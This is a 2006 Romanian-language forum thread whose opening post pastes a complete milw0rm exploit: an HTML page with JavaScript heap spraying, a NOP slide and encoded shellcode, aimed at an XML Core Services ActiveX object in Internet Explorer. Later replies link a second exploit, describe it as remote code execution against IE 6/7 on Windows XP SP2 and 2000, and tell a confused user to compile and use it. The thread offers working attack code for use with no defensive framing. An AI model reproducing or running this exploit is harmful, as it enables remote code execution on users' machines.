escalation666 Posted November 10, 2006 Report Share Posted November 10, 2006 #se pare ca ti-au raspuns astia la intrebari<html xmlns="http://www.w3.org/1999/xhtml"><body><script> var heapSprayToAddress = 0x05050505; var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");</script><script> var heapBlockSize = 0x400000; var payLoadSize = payLoadCode.length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x3b); var spraySlide = unescape("%u9090%u9090"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize; memory = new Array(); for (i=0;i<heapBlocks;i++) { memory = spraySlide + payLoadCode; } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2<spraySlideSize) { spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; }</script><object id=target classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5" ></object><script>var obj = null;obj = document.getElementById('target').object;try {obj.open(new Array(),new Array(),new Array(),new Array(),new Array());} catch(e) {};obj.open(new Object(),new Object(),new Object(),new Object(), new Object()); obj.setRequestHeader(new Object(),'......');obj.setRequestHeader(new Object(),0x1234567b);obj.setRequestHeader(new Object(),0x1234567b);obj.setRequestHeader(new Object(),0x1234567b);obj.setRequestHeader(new Object(),0x1234567b);obj.setRequestHeader(new Object(),0x1234567b);obj.setRequestHeader(new Object(),0x1234567b);obj.setRequestHeader(new Object(),0x1234567b);obj.setRequestHeader(new Object(),0x1234567b);obj.setRequestHeader(new Object(),0x1234567b);obj.setRequestHeader(new Object(),0x1234567b);obj.setRequestHeader(new Object(),0x1234567b);</script></body></html># milw0rm.com [2006-11-10] Quote Link to comment Share on other sites More sharing options...
HexString Posted November 10, 2006 Report Share Posted November 10, 2006 imi spuneti pls si mie ce face ca nu m-am prins Quote Link to comment Share on other sites More sharing options...
RedJoker Posted November 11, 2006 Report Share Posted November 11, 2006 foloseste-l asta ca e mai logic:http://milw0rm.com/exploits/2753 Quote Link to comment Share on other sites More sharing options...
HexString Posted November 11, 2006 Report Share Posted November 11, 2006 Dar ce face ? Quote Link to comment Share on other sites More sharing options...
virusz Posted November 11, 2006 Report Share Posted November 11, 2006 Face ce face si al lui escalation666 doar ca e scris in alt limbaj, il compilezi si il folosesti!-MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution ExploitWorks on Windows XP versions including SP2 and 2K -bafta! Quote Link to comment Share on other sites More sharing options...
HexString Posted November 11, 2006 Report Share Posted November 11, 2006 mda oricum las-o balta... am zis ca eu nu stiu ce face asta :)nici pe primu nici al doilea Quote Link to comment Share on other sites More sharing options...
